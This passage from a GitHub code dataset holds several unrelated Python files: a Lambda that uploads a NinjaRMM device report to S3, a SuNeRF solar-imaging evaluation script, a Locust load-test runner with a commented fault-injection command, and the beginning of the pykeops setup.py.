data.to_csv(path.join(args.output_folder, \"output_data.csv\"))\n\n\nif __name__ == \"__main__\":\n interface()\n","repo_name":"FBorowiec/scrapers","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17845062569","text":"from io import StringIO\nfrom csv import DictWriter\nfrom datetime import datetime\nimport json\nimport os\n\nimport ninjarmmpy\nimport boto3\n\n\ndef return_servers_report(key: str, secret: str) -> str:\n \"\"\"Returns a report of devices without anti-virus in CSV format.\n Keyword arguments:\n key: str -- NinjaRMM API Key ID\n secret: str -- NinjaRMM API Secret ID\n \"\"\"\n client = ninjarmmpy.Client(\n AccessKeyID=key,\n SecretAccessKey=secret\n )\n device_ids = client.getGroupDeviceIds(id=os.getenv(key='DEVICE_GROUP'))\n devices = [client.getDevice(id=i) for i in device_ids]\n output = []\n with StringIO() as f:\n fields = [\n 'organization', 'dns_name', 'role', 'device_id', 'os_name',\n 'needs_reboot', 'last_user', 'device_link'\n ]\n writer = DictWriter(f, fieldnames=fields)\n writer.writeheader()\n for d in devices:\n device_role = d['nodeClass']\n device_name = d['dnsName']\n device_org = client.getOrganization(id=d['organizationId'])['name']\n row = {\n 'organization': device_org,\n 'dns_name': device_name,\n 'role': device_role,\n 'device_id': d.get('id', None),\n 'os_name': d.get('os', None).get('name', None),\n 'needs_reboot': d.get('os', None).get('needsReboot', None),\n 'last_user': d.get('lastLoggedInUser', None),\n 'device_link': f\"https://app.ninjarmm.com/#/deviceDashboard/{d.get('id', 'Error')}/overview\"\n }\n output.append(row)\n writer.writerows(output)\n return f.getvalue()\n\n\ndef lambda_handler(event, context):\n key, secret, bucket = (\n os.getenv(key='NRMM_KEY_ID'),\n os.getenv(key='NRMM_SECRET'),\n os.getenv(key='S3_BUCKET')\n )\n if not all((key, secret, bucket)):\n exit(code=-3)\n servers = return_servers_report(key, secret)\n s3 = boto3.resource('s3')\n s3.Bucket(bucket).put_object(\n Key=f'{datetime.today()}.csv',\n Body=servers\n )\n return {\n 'statusCode': 200,\n 'body': json.dumps('Mission complete!')\n }\n","repo_name":"ak9999/ex_generate_report_send_to_s3","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13524707460","text":"import datetime\nimport glob\nimport os\n\nimport numpy as np\nimport torch\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.nddata import block_reduce\nfrom astropy.visualization import ImageNormalize, AsinhStretch\nfrom chronnos.evaluate.detect import CHRONNOSDetector\nfrom matplotlib import pyplot as plt, cm\nfrom matplotlib.colors import Normalize, SymLogNorm\nfrom sunpy.map import Map\nfrom tqdm import tqdm\n\nfrom sunerf.data.utils import sdo_cmaps, sdo_norms\nfrom sunerf.evaluation.loader import SuNeRFLoader\nfrom sunerf.utilities.reprojection import create_heliographic_map, create_new_observer\n\nchk_path = '/mnt/nerf-data/sunerf_ensemble/ensemble_4/save_state.snf'\nvideo_path = '/mnt/results/polar_view'\n\nos.makedirs(video_path, exist_ok=True)\n\nstereo_a_map = Map('/mnt/nerf-data/prep_2012_08/193/2012-08-30T00:00:00_A.fits')\nstereo_b_map = Map('/mnt/nerf-data/prep_2012_08/193/2012-08-30T00:00:00_B.fits')\nsdo_map = Map('/mnt/nerf-data/prep_2012_08/193/aia.lev1_euv_12s.2012-08-30T000008Z.193.image_lev1.fits')\n\nplt.imsave(os.path.join(video_path, 'stereo_a.jpg'), stereo_a_map.data, cmap=sdo_cmaps[193], vmin=0, vmax=1,\n origin='lower')\nplt.imsave(os.path.join(video_path, 'stereo_b.jpg'), stereo_b_map.data, cmap=sdo_cmaps[193], vmin=0, vmax=1,\n origin='lower')\nplt.imsave(os.path.join(video_path, 'sdo.jpg'), sdo_map.data, cmap=sdo_cmaps[193], vmin=0, vmax=1, origin='lower')\n\nh_map = create_heliographic_map(sdo_map, stereo_a_map, stereo_b_map)\n\nn_gpus = torch.cuda.device_count()\n\n# init loader\nW = 2048\nscale = 2.2 * sdo_map.rsun_obs / (W * u.pix) # frame fov width = 2.2 solar radii\n\nfocal = (.5 * W) / np.arctan((1.1 * sdo_map.rsun_obs).to(u.deg).value * np.pi / 180)\nloader = SuNeRFLoader(chk_path, resolution=W, focal=focal)\ncmap = sdo_cmaps[loader.wavelength]\n\ntime, d = sdo_map.date.to_datetime(), sdo_map.dsun.to(u.solRad).value\nlon = sdo_map.carrington_longitude.value + 60\n\n####################### PLOT SuNeRF #######################\nlats = np.linspace(0, -90, 4).astype(int)\nfor lat in tqdm(lats, desc='Plot Latitudes'):\n outputs = loader.load_observer_image(lat, -lon, time, distance=d, batch_size=4096 * n_gpus, strides=1)\n fig, ax = plt.subplots(1, 1, figsize=(10, 10))\n channel_mpb = ax.imshow(sdo_norms[193].inverse(outputs['channel_map']), cmap=cmap, norm=sdo_norms[193],\n origin='lower')\n ax.set_axis_off()\n plt.tight_layout(pad=0)\n fig.savefig(os.path.join(video_path, f'sunerf_{lat}.jpg'), dpi=300)\n plt.close(fig)\n\n observer = create_new_observer(sdo_map, lat * u.deg, 60 * u.deg, sdo_map.dsun)\n sdo_new_view = h_map.reproject_to(observer)\n sr = sdo_new_view.rsun_obs\n sdo_new_view = sdo_new_view.submap(bottom_left=SkyCoord(-sr * 1.1, -sr * 1.1, frame=sdo_new_view.coordinate_frame),\n top_right=SkyCoord(sr * 1.1, sr * 1.1, frame=sdo_new_view.coordinate_frame))\n plt.imsave(os.path.join(video_path, f'baseline_{lat}.jpg'), np.nan_to_num(sdo_new_view.data, nan=0),\n cmap=sdo_cmaps[193], vmin=0, vmax=1, origin='lower')\n\nfig, ax = plt.subplots(1, 1, figsize=(3, 3))\ncbar = plt.colorbar(channel_mpb, ax=ax, )\ncbar.ax.set_yticks([0, 3e3, 6e3, 9e3], ['0', '3e3', '6e3', '9e3'])\nax.remove()\nfig.savefig(os.path.join(video_path, 'data_colorbar.png'), dpi=300, transparent=True)\nplt.close()\n\n####################### PLOT Uncertainty #######################\n\nensemble_chks = sorted(glob.glob('/mnt/nerf-data/sunerf_ensemble/*/save_state.snf'))\nuncertainty_imgs = []\nfor lat in tqdm(lats, desc='Ensemble'):\n ensemble_maps = []\n for chk in ensemble_chks:\n loader = SuNeRFLoader(chk, resolution=W, focal=focal)\n outputs = loader.load_observer_image(lat, -lon, time, distance=d, batch_size=4096 * n_gpus, strides=1)\n ensemble_maps += [outputs['channel_map']]\n uncertainty_imgs += [np.std(ensemble_maps, 0) * 100]\n\nunc_norm = SymLogNorm(vmin=0, vmax=20, linthresh=5, clip=True)\nfor img, lat in zip(uncertainty_imgs, lats):\n fig, ax = plt.subplots(1, 1, figsize=(10, 10))\n unc_mpb = ax.imshow(img, norm=unc_norm, cmap='inferno', origin='lower')\n ax.set_axis_off()\n plt.tight_layout(pad=0)\n fig.savefig(os.path.join(video_path, f'uncertainty_{lat}.jpg'), dpi=300)\n plt.close(fig)\n\nfig, ax = plt.subplots(1, 1, figsize=(3, 3))\ncbar = plt.colorbar(unc_mpb, ax=ax, )\ncbar.ax.set_yticks([1, 5, 10, 20], ['1%', '5%', '10%', '20%'])\nax.remove()\nfig.savefig(os.path.join(video_path, 'unc_colorbar.png'), dpi=300, transparent=True)\nplt.close()\n\n####################### PLOT all SuNeRF wavelengths #######################\n\n# 193\nloader_193 = SuNeRFLoader(chk_path, resolution=W, focal=focal)\ncmap = sdo_cmaps[loader_193.wavelength]\noutputs_193 = loader_193.load_observer_image(-90, -lon, time, distance=d, batch_size=4096 * n_gpus, strides=1)\nplt.imsave(os.path.join(video_path, f'sunerf_193.jpg'), outputs_193['channel_map'], cmap=cmap, vmin=0, vmax=1,\n origin='lower')\ndel loader_193\n\n# 304\nloader_304 = SuNeRFLoader('/mnt/nerf-data/transfer_runs/304/save_state.snf', resolution=W, focal=focal)\ncmap = sdo_cmaps[loader_304.wavelength]\noutputs_304 = loader_304.load_observer_image(-90, -lon, time, distance=d, batch_size=4096 * n_gpus, strides=1)\nplt.imsave(os.path.join(video_path, f'sunerf_304.jpg'), outputs_304['channel_map'], cmap=cmap, vmin=0, vmax=.7,\n origin='lower')\ndel loader_304\n\n# 171\nloader_171 = SuNeRFLoader('/mnt/nerf-data/transfer_runs/171/save_state.snf', resolution=W, focal=focal)\ncmap = sdo_cmaps[loader_171.wavelength]\noutputs_171 = loader_171.load_observer_image(-90, -lon, time, distance=d, batch_size=4096 * n_gpus, strides=1)\nplt.imsave(os.path.join(video_path, f'sunerf_171.jpg'), outputs_171['channel_map'], cmap=cmap, vmin=0, vmax=1,\n origin='lower')\ndel loader_171\n\n# 211\nloader_211 = SuNeRFLoader('/mnt/nerf-data/transfer_runs/211/save_state.snf', resolution=W, focal=focal)\ncmap = sdo_cmaps[loader_211.wavelength]\noutputs_211 = loader_211.load_observer_image(-90, -lon, time, distance=d, batch_size=4096 * n_gpus, strides=1)\nplt.imsave(os.path.join(video_path, f'sunerf_211.jpg'), outputs_211['channel_map'], cmap=cmap, vmin=0, vmax=1,\n origin='lower')\ndel loader_211\n\n####################### Detect Coronal Hole #######################\nchronnos_detector = CHRONNOSDetector(model_name='chronnos_euv_v1_0.pt')\nsdo_ch_map = chronnos_detector.predict(\n [['/mnt/nerf-data/sdo_2012_08/1h_171/aia.lev1_euv_12s.2012-08-30T000012Z.171.image_lev1.fits'],\n ['/mnt/nerf-data/sdo_2012_08/1h_193/aia.lev1_euv_12s.2012-08-30T000008Z.193.image_lev1.fits'],\n ['/mnt/nerf-data/sdo_2012_08/1h_211/aia.lev1_euv_12s.2012-08-30T000001Z.211.image_lev1.fits'],\n ['/mnt/nerf-data/sdo_2012_08/1h_304/aia.lev1_euv_12s.2012-08-30T000009Z.304.image_lev1.fits']], reproject=True)[0]\nf, ax = plt.subplots(1, 1, figsize=(10, 10))\nax.imshow(sdo_map.data, extent=(-1, 1, -1, 1), origin='lower', vmin=0, vmax=1, cmap=sdo_cmaps[193])\nax.contour(sdo_ch_map.data, levels=[0.3], colors=['tab:blue'], extent=(-1, 1, -1, 1), linewidths=5)\nax.set_axis_off()\nplt.tight_layout(pad=0)\nf.savefig(os.path.join(video_path, f'sdo_ch.jpg'), dpi=300)\nplt.close(f)\n\nstereo_a_ch_map = chronnos_detector.predict([\n ['/mnt/nerf-data/stereo_2012_08_converted_fov/171/2012-08-30T00:00:00_A.fits'],\n ['/mnt/nerf-data/stereo_2012_08_converted_fov/195/2012-08-30T00:00:00_A.fits'],\n ['/mnt/nerf-data/stereo_2012_08_converted_fov/284/2012-08-30T00:00:00_A.fits'],\n ['/mnt/nerf-data/stereo_2012_08_converted_fov/304/2012-08-30T00:00:00_A.fits']], calibrate=False, reproject=True)[0]\nf, ax = plt.subplots(1, 1, figsize=(10, 10))\nax.imshow(stereo_a_map.data, extent=(-1, 1, -1, 1), origin='lower', vmin=0, vmax=1, cmap=sdo_cmaps[193])\nax.contour(stereo_a_ch_map.data, levels=[0.3], colors=['tab:blue'], extent=(-1, 1, -1, 1), linewidths=5)\nax.set_axis_off()\nplt.tight_layout(pad=0)\nf.savefig(os.path.join(video_path, f'stereo_a_ch.jpg'), dpi=300)\nplt.close(f)\n\nstereo_b_ch_map = chronnos_detector.predict([\n ['/mnt/nerf-data/stereo_2012_08_converted_fov/171/2012-08-30T00:00:00_B.fits'],\n ['/mnt/nerf-data/stereo_2012_08_converted_fov/195/2012-08-30T00:00:00_B.fits'],\n ['/mnt/nerf-data/stereo_2012_08_converted_fov/284/2012-08-30T00:00:00_B.fits'],\n ['/mnt/nerf-data/stereo_2012_08_converted_fov/304/2012-08-30T00:00:00_B.fits']], calibrate=False, reproject=True)[0]\nf, ax = plt.subplots(1, 1, figsize=(10, 10))\nax.imshow(stereo_b_map.data, extent=(-1, 1, -1, 1), origin='lower', vmin=0, vmax=1, cmap=sdo_cmaps[193])\nax.contour(stereo_b_ch_map.data, levels=[0.3], colors=['tab:blue'], extent=(-1, 1, -1, 1), linewidths=5)\nax.set_axis_off()\nplt.tight_layout(pad=0)\nf.savefig(os.path.join(video_path, f'stereo_b_ch.jpg'), dpi=300)\nplt.close(f)\n\nch_map = create_heliographic_map(sdo_ch_map, stereo_a_ch_map, stereo_b_ch_map)\nplt.imsave(os.path.join(video_path, f'ch_map.jpg'), np.nan_to_num(ch_map.data, nan=0))\n\nobserver = create_new_observer(sdo_map, -90 * u.deg, 60 * u.deg, sdo_map.dsun)\nch_map = ch_map.reproject_to(observer)\nsr = ch_map.rsun_obs\nch_map = ch_map.submap(bottom_left=SkyCoord(-sr * 1.1, -sr * 1.1, frame=ch_map.coordinate_frame),\n top_right=SkyCoord(sr * 1.1, sr * 1.1, frame=ch_map.coordinate_frame))\n\nchronnos_norms = {\n 171: ImageNormalize(vmin=0, vmax=6457.5, stretch=AsinhStretch(0.005), clip=True), # 171\n 193: ImageNormalize(vmin=0, vmax=7757.31, stretch=AsinhStretch(0.005), clip=True), # 193\n 211: ImageNormalize(vmin=0, vmax=6539.8, stretch=AsinhStretch(0.005), clip=True), # 211\n 304: ImageNormalize(vmin=0, vmax=3756, stretch=AsinhStretch(0.005), clip=True), # 304\n}\n\nimg_171 = block_reduce(outputs_171['channel_map'], (4, 4), func=np.mean)\nimg_171 = chronnos_norms[171](sdo_norms[171].inverse(img_171))\n\nimg_193 = block_reduce(outputs_193['channel_map'], (4, 4), func=np.mean)\nimg_193 = chronnos_norms[193](sdo_norms[193].inverse(img_193))\n\nimg_211 = block_reduce(outputs_211['channel_map'], (4, 4), func=np.mean)\nimg_211 = chronnos_norms[211](sdo_norms[211].inverse(img_211))\n\nimg_304 = block_reduce(outputs_304['channel_map'], (4, 4), func=np.mean)\nimg_304 = chronnos_norms[304](sdo_norms[304].inverse(img_304))\n\ninput_img = np.stack([img_171, img_193, img_211, img_304], 0).astype(np.float32)\ninput_img = torch.from_numpy(input_img)[None].cuda() * 2 - 1\nwith torch.no_grad():\n ch_detection = chronnos_detector.model(input_img).cpu()[0, 0]\n\nf, ax = plt.subplots(1, 1, figsize=(10, 10))\nax.imshow(outputs_193['channel_map'], extent=(-1, 1, -1, 1), origin='lower', vmin=0, vmax=1, cmap=sdo_cmaps[193])\nsunerf_ch_line = ax.contour(ch_detection, levels=[0.3], colors=['red'], extent=(-1, 1, -1, 1), linestyles='dashed',\n linewidths=4)\nreprojection_ch_line = ax.contour(ch_map.data, levels=[0.3], colors=['tab:blue'], extent=(-1, 1, -1, 1),\n linestyles='dashed', linewidths=4)\nax.set_axis_off()\nplt.tight_layout(pad=0)\nf.savefig(os.path.join(video_path, f'sunerf_ch.jpg'), dpi=300)\nplt.close(f)\n\nfig = plt.figure(figsize=(3, 2))\nfig.legend(sunerf_ch_line.legend_elements()[0] + reprojection_ch_line.legend_elements()[0],\n ['SuNeRF', 'Reprojection'], loc='center', fancybox=True, shadow=True, borderpad=1)\nfig.savefig(os.path.join(video_path, 'ch_legend.png'), dpi=300, transparent=True)\nplt.close(fig)\n\n####################### PLOT viewpoints #######################\nsdo_files = glob.glob('/mnt/nerf-data/prep_2012_08/193/aia*')\nsdo_maps = [Map(f) for f in sdo_files]\n\nstereo_a_files = glob.glob('/mnt/nerf-data/prep_2012_08/193/*_A.fits')\nstereo_a_maps = [Map(f) for f in stereo_a_files]\n\nstereo_b_files = glob.glob('/mnt/nerf-data/prep_2012_08/193/*_B.fits')\nstereo_b_maps = [Map(f) for f in stereo_b_files]\n\nsdo_r = [m.dsun.to(u.solRad).value for m in sdo_maps]\nsdo_theta = [m.carrington_longitude.value * np.pi / 180 for m in sdo_maps]\nsdo_dates = np.array([m.date.to_datetime() for m in sdo_maps])\n\nstereo_a_r = [m.dsun.to(u.solRad).value for m in stereo_a_maps]\nstereo_a_theta = [m.carrington_longitude.value * np.pi / 180 for m in stereo_a_maps]\nstereo_a_dates = np.array([m.date.to_datetime() for m in stereo_a_maps])\n\nstereo_b_r = [m.dsun.to(u.solRad).value for m in stereo_b_maps]\nstereo_b_theta = [m.carrington_longitude.value * np.pi / 180 for m in stereo_b_maps]\nstereo_b_dates = np.array([m.date.to_datetime() for m in stereo_b_maps])\n\ndates = np.concatenate([sdo_dates, stereo_a_dates, stereo_b_dates])\nmin_date = np.min(dates)\ndates = (dates - min_date) / datetime.timedelta(days=1)\n\nsdo_dates = (sdo_dates - min_date) / datetime.timedelta(days=1)\nstereo_a_dates = (stereo_a_dates - min_date) / datetime.timedelta(days=1)\nstereo_b_dates = (stereo_b_dates - min_date) / datetime.timedelta(days=1)\nsdo_dates = sdo_dates.astype(np.float32)\nstereo_a_dates = stereo_a_dates.astype(np.float32)\nstereo_b_dates = stereo_b_dates.astype(np.float32)\n\nnorm = Normalize(vmin=np.min(dates), vmax=np.max(dates))\n\nf = plt.figure(figsize=(20, 20))\nax = f.add_subplot(111, polar=True)\n\n# SDO\nsdo_cm = cm.get_cmap('Blues')\ncolors = sdo_cm(norm(sdo_dates))\ncs = colors.tolist()\nfor c in colors:\n cs.append(c)\n cs.append(c)\nax.quiver(sdo_theta, sdo_r, -np.cos(sdo_theta), -np.sin(sdo_theta), pivot='tail', color=colors, scale=30,\n edgecolor='black', linewidth=1)\nsdo_obs_theta = sdo_map.carrington_longitude.value * np.pi / 180\nax.quiver(sdo_obs_theta, 250, -np.cos(sdo_obs_theta), -np.sin(sdo_obs_theta), pivot='tail', color='blue', scale=20,\n edgecolor='black', linewidth=1)\n# STEREO A\nsdo_cm = cm.get_cmap('Greens')\ncolors = sdo_cm(norm(stereo_a_dates))\ncs = colors.tolist()\nfor c in colors:\n cs.append(c)\n cs.append(c)\nax.quiver(stereo_a_theta, stereo_a_r, -np.cos(stereo_a_theta), -np.sin(stereo_a_theta), pivot='tail', color=colors,\n scale=30, edgecolor='black', linewidth=1)\nstereo_a_obs_theta = stereo_a_map.carrington_longitude.value * np.pi / 180\nax.quiver(stereo_a_obs_theta, 250, -np.cos(stereo_a_obs_theta), -np.sin(stereo_a_obs_theta), pivot='tail',\n color='green', scale=20, edgecolor='black', linewidth=1)\n# STEREO B\nsdo_cm = cm.get_cmap('Reds')\ncolors = sdo_cm(norm(stereo_b_dates))\ncs = colors.tolist()\nfor c in colors:\n cs.append(c)\n cs.append(c)\nax.quiver(stereo_b_theta, stereo_b_r, -np.cos(stereo_b_theta), -np.sin(stereo_b_theta), pivot='tail', color=colors,\n scale=30, edgecolor='black', linewidth=1)\nstereo_b_obs_theta = stereo_b_map.carrington_longitude.value * np.pi / 180\nax.quiver(stereo_b_obs_theta, 250, -np.cos(stereo_b_obs_theta), -np.sin(stereo_b_obs_theta), pivot='tail', color='red',\n scale=20, edgecolor='black', linewidth=1)\nobs_theta = lon * np.pi / 180\nax.quiver(obs_theta, 250, -np.cos(obs_theta), -np.sin(obs_theta), pivot='tail', color='white', scale=20,\n edgecolor='black', linewidth=1)\n\nax.scatter(0, 0, color='white')\n\nax.set_axis_off()\nf.savefig(os.path.join(video_path, 'viewpoints.png'), dpi=300, transparent=True)\nplt.close(f)\n\n######################### TEST observed limb alignment #########################\n# observer = create_new_observer(sdo_map, -90 * u.deg, 60 * u.deg, sdo_map.dsun)\n# sdo_new_view = h_map.reproject_to(observer)\n# sr = sdo_new_view.rsun_obs\n# sdo_new_view = sdo_new_view.submap(bottom_left=SkyCoord(-sr * 1.1, -sr * 1.1, frame=sdo_new_view.coordinate_frame),\n# top_right=SkyCoord(sr * 1.1, sr * 1.1, frame=sdo_new_view.coordinate_frame))\n#\n# outputs_193 = loader_193.load_observer_image(-90, -lon, time, distance=d, batch_size=4096 * n_gpus, strides=4, ref_pixel=sdo_map.reference_pixel)\n#\n# f, ax = plt.subplots(2, 2, figsize=(10, 10))\n# ax[0, 0].imshow(sdo_new_view.data, extent=(-1, 1, -1, 1), origin='lower', vmin=0, vmax=1, cmap=sdo_cmaps[193])\n# ax[0, 0].contour(ch_detection, levels=[0.3], colors=['red'], extent=(-.95, .95, -.95, .95), linestyles='dashed')\n# ax[0, 1].imshow(sdo_new_view.data, extent=(-1, 1, -1, 1), origin='lower', vmin=0, vmax=1, cmap=sdo_cmaps[193])\n# ax[0, 1].contour(ch_map.data, levels=[0.3], colors=['tab:blue'], extent=(-1, 1, -1, 1), linestyles='dashed')\n#\n# coords = all_coordinates_from_map(ch_map)\n# r = np.sqrt(coords.Tx ** 2 + coords.Ty ** 2) / ch_map.rsun_obs\n# ax[1, 0].imshow(outputs_193['channel_map'], extent=(-1, 1, -1, 1), origin='lower', vmin=0, vmax=1, cmap=sdo_cmaps[193])\n# ax[1, 0].contour(ch_detection, levels=[0.3], colors=['red'], extent=(-1, 1, -1, 1), linestyles='dashed')\n# ax[1, 1].imshow(outputs_193['channel_map'], extent=(-1, 1, -1, 1), origin='lower', vmin=0, vmax=1, cmap=sdo_cmaps[193])\n# ax[1, 1].contour(r, levels=[1], colors=['red'], extent=(-1, 1, -1, 1), linestyles='dashed')\n# ax[1, 1].contour(ch_map.data, levels=[0.3], colors=['tab:blue'], extent=(-1.0, 1.0, -1.0, 1.0), linestyles='dashed')\n# # ax.set_axis_off()\n# plt.tight_layout(pad=0)\n# f.savefig(os.path.join(video_path, f'test.jpg'), dpi=300)\n# plt.close(f)\n","repo_name":"RobertJaro/SuNeRF","sub_path":"sunerf/evaluation/polar_view.py","file_name":"polar_view.py","file_ext":"py","file_size_in_byte":16984,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"35373296160","text":"import logging\nimport sys\nimport argparse\nimport os\n\nfrom utils.tools import run_external_applicaton\n\nfrom rca4tracing.common.utils import get_proj_dir\n\nproj_dir = get_proj_dir()\nfolder_name = os.path.join(proj_dir, 'rca4tracing/fault_injection/workload_generator')\n\n\ndef run(test_id, users=2, run_time=240, spawn_rate=50, host=\"http://localhost:8080\"):\n driver = folder_name+\"/locustfile.py\"\n # print(driver)\n # host = \"http://localhost:8080\" # current_configuration[\"locust_host_url\"]\n load = users # current_configuration[\"load\"]\n # spawn_rate = 50 # current_configuration[\"spawn_rate_per_second\"] user spawn / second\n # run_time = 240 # current_configuration[\"run_time_in_seconds\"]\n log_file = folder_name+\"/output/locust_test.log\" # os.path.splitext(driver)[0] + \".log\"\n # print ('folder_name:', folder_name)\n out_file = folder_name+\"/output/locust_test.out\" # os.path.splitext(driver)[0] + \".out\"\n csv_prefix = folder_name+\"/output/result\" # os.path.join(os.path.dirname(driver), \"result\")\n logging.info(f\"Running the load test for {test_id}, with {load} users, running for {run_time} seconds.\")\n\n print(f'test_id:{test_id}, load:{load}, spawn_rate:{spawn_rate}')\n run_external_applicaton(\n f'locust --locustfile {driver} --host {host} --users {load} --spawn-rate {spawn_rate} --run-time {run_time}s '\n f'--headless --only-summary --csv {csv_prefix} --csv-full-history --logfile \"{log_file}\" --loglevel DEBUG >> '\n f'{out_file} 2> {out_file}',\n False)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--run_time',\n help=\"run time of the test\",\n default=200,\n type=int)\n parser.add_argument('--users',\n default=20,\n type=int)\n parser.add_argument('--spawn_rate',\n default=20,\n type=int)\n parser.add_argument('--host',\n default='http://localhost:8080',\n type=str)\n\n args = parser.parse_args()\n test_id = 1\n run(test_id, \n users=args.users, \n run_time=args.run_time, \n spawn_rate=args.spawn_rate,\n host=args.host)\n #blade create network delay --time 3000 --interface eth0 --local-port 12345 --timeout 20","repo_name":"lonyle/ShapleyIQ","sub_path":"rca4tracing/fault_injection/workload_generator/run_load_test.py","file_name":"run_load_test.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33943211549","text":"# Always prefer setuptools over distutils\n# To use a consistent encoding\nfrom codecs import open\nimport os\nfrom os import path\n\nfrom setuptools import setup\n\nhere = path.abspath(path.dirname(__file__))\n\nwith open(os.path.join(here, \"pykeops\", \"version\"), encoding=\"utf-8\") as v:\n current_version = v.read().rstrip()\n\n# Get the long description from the README file\nwith open(path.join(here, \"pykeops\", \"readme.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\n\ndef import_files(dirname, ext=[\"h\", \"hpp\"]):\n _dirname = path.join(os.getcwd(), \"pykeops\", dirname)\n res = [\n path.join(dirname, f)\n for f in os.listdir(_dirname)\n if any(f.endswith(ext) for ext in ext)\n ]\n return res\n\n\n# List file from Pybind11 sources\npybind11_files = [\n \"pybind11/include/pybind11/detail/class.h\",\n \"pybind11/include/pybind11/detail/common.h\",\n \"pybind11/include/pybind11/detail/descr.h\",\n \"pybind11/include/pybind11/detail/init.h\",\n \"pybind11/include/pybind11/detail/internals.h\",\n \"pybind11/include/pybind11/detail/typeid.h\",\n \"pybind11/include/pybind11/attr.h\",\n \"pybind11/include/pybind11/buffer_info.h\",\n \"pybind11/include/pybind11/cast.h\",\n \"pybind11/include/pybind11/chrono.h\",\n \"pybind11/include/pybind11/common.h\",\n \"pybind11/include/pybind11/complex.h\",\n \"pybind11/include/pybind11/eigen.h\",\n \"pybind11/include/pybind11/embed.h\",\n \"pybind11/include/pybind11/eval.h\",\n \"pybind11/include/pybind11/functional.h\",\n \"pybind11/include/pybind11/iostream.h\",\n \"pybind11/include/pybind11/numpy.h\",\n \"pybind11/include/pybind11/operators.h\",\n \"pybind11/include/pybind11/options.h\",\n \"pybind11/include/pybind11/pybind11.h\",\n \"pybind11/include/pybind11/pytypes.h\",\n \"pybind11/include/pybind11/stl.h\",\n \"pybind11/include/pybind11/stl_bind.h\",\n \"pybind11/CMakeLists.txt\",\n \"pybind11/tools/cmake_uninstall.cmake.in\",\n \"pybind11/tools/FindCatch.cmake\",\n \"pybind11/tools/FindEigen3.cmake\",\n \"pybind11/tools/FindPythonLibsNew.cmake\",\n \"pybind11/tools/pybind11Common.cmake\",\n \"pybind11/tools/pybind11Config.cmake.in\",\n \"pybind11/tools/pybind11NewTools.cmake\",\n \"pybind11/tools/pybind11Tools.cmake\",\n \"pybind11/tools/setup_global.py.in\",\n \"pybind11/tools/setup_main.py.in\",\n]\n\ntao_seq_files = import_files(\"keops/lib/sequences/include/tao/seq/\") + import_files(\n \"keops/lib/sequences/include/tao/seq/contrib/\"\n)\n\nsetup(\n name=\"pykeops\",\n version=current_version,\n description=\"Python bindings of KeOps: KErnel OPerationS, on CPUs and GPUs, with autodiff and without memory overflows\", # Required\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"http://www.kernel-operations.io/\",\n project_urls={\n \"Bug Reports\": \"https://github.com/getkeops/keops/issues\",\n \"Source\": \"https://github.com/getkeops/keops\",\n },\n author=\"B. Charlier, J. Feydy, J. Glaunes\",\n author_email=\"benjamin.charlier@umontpellier.fr, jean.feydy@gmail.com, alexis.glaunes@parisdescartes.fr\",\n python_requires=\">=3\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Topic :: Scientific/Engineering\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: POSIX :: Linux\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Programming Language :: C++\",\n \"Programming Language :: Python :: 3 :: Only\",\n ],\n keywords=\"kernels gpu autodiff\",\n packages=[\n \"pykeops\",\n \"pykeops.common\",\n \"pykeops.numpy\",\n \"pykeops.numpy.cluster\",\n \"pykeops.numpy.convolutions\",\n \"pykeops.numpy.generic\",\n \"pykeops.numpy.lazytensor\",\n \"pykeops.numpy.shape_distance\",\n \"pykeops.test\",\n \"pykeops.torch\",\n \"pykeops.torch.cluster\",\n \"pykeops.torch.generic\",\n \"pykeops.torch.lazytensor\",\n \"pykeops.torch.kernel_product\",\n ],\n package_data={\n \"pykeops\": [\n \"readme.md\",\n \"licence.txt\",\n \"CMakeLists.txt\",\n \"torch_headers.h.in\",\n \"numpy/convolutions/radial_kernel_conv.cpp\",\n \"numpy/convolutions/radial_kernel_grad1conv.cpp\",\n \"numpy/generic/generic_red.cpp\",\n \"numpy/shape_distance/fshape_scp.cpp\",\n \"torch/generic/generic_red.cpp\",\n \"torch/generic/generic_red.cpp\",\n \"common/keops_io.h\",\n \"keops/cuda.cmake\",\n \"keops/formula.h.in\",\n \"keops/headers.cmake\",\n \"keops/keops_includes.h\",\n \"version\",\n ]\n + import_files(path.join(\"keops\", \"binders\"))\n + import_files(path.join(\"keops\", \"core\", \"autodiff\"))\n + import_files(path.join(\"keops\", \"core\", \"pack\"))\n + import_files(path.join(\"keops\", \"core\", \"formulas\"))\n + import_files(path.join(\"keops\", \"core\", \"formulas\", \"constants\"))\n + import_files(path.join(\"keops\", \"core\", \"formulas\", \"kernels\"))\n + import_files(path.join(\"keops\", \"core\", \"formulas\", \"maths\"))\n + import_files(path.join(\"keops\", \"core\", \"formulas\", \"norms\"))\n + import_files(path.join(\"keops\", \"core\", \"reductions\"))\n + import_files(path.join(\"keops\", \"core\", \"utils\"), [\"h\", \"cu\"])\n + import_files(path.join(\"keops\", \"core\", \"mapreduce\"), [\"h\", \"cpp\", \"cu\"])\n + import_files(path.join(\"keops\", \"core\"), [\"h\", \"cpp\", \"cu\"])\n + [\n \"keops/specific/CMakeLists.txt\",\n \"keops/specific/radial_kernels/cuda_conv.cu\",\n \"keops/specific/radial_kernels/cuda_conv.cx\",\n \"keops/specific/radial_kernels/cuda_grad1conv.cu\",\n \"keops/specific/radial_kernels/cuda_grad1conv.cx\",\n \"keops/specific/radial_kernels/radial_kernels.h\",\n \"keops/specific/shape_distance/fshape_gpu.cu\",\n \"keops/specific/shape_distance/fshape_gpu.cx\",\n 